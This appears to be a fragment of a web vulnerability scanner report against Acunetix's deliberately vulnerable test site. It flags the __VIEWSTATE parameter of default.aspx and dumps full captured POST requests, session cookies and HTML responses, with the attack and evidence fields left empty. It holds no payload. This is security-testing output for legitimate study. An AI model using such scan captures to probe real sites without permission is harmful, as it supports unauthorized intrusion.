Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8625&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAwjyQm9sIZGRku326mf8Em5Isu12sSuj9n4%2BLwEw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKxouzJCwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogbFJygZ5x%2FziXUeJ7VbGW%2FV%2BCloGQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:30 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAwjyQm9sIZGRku326mf8Em5Isu12sSuj9n4+LwEw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKxouzJCwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogbFJygZ5x/ziXUeJ7VbGW/V+CloGQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:White" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8613&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAzT8iktsIZGRkimAo7yu98ZdXxTQ77XZzIp2Xj7w%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKR0Y%2FmCAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPoga4thSsztU5zOExwfRfb1C9K6Xt3w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:32 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAzT8iktsIZGRkimAo7yu98ZdXxTQ77XZzIp2Xj7w=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKR0Y/mCAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPoga4thSsztU5zOExwfRfb1C9K6Xt3w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:White" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
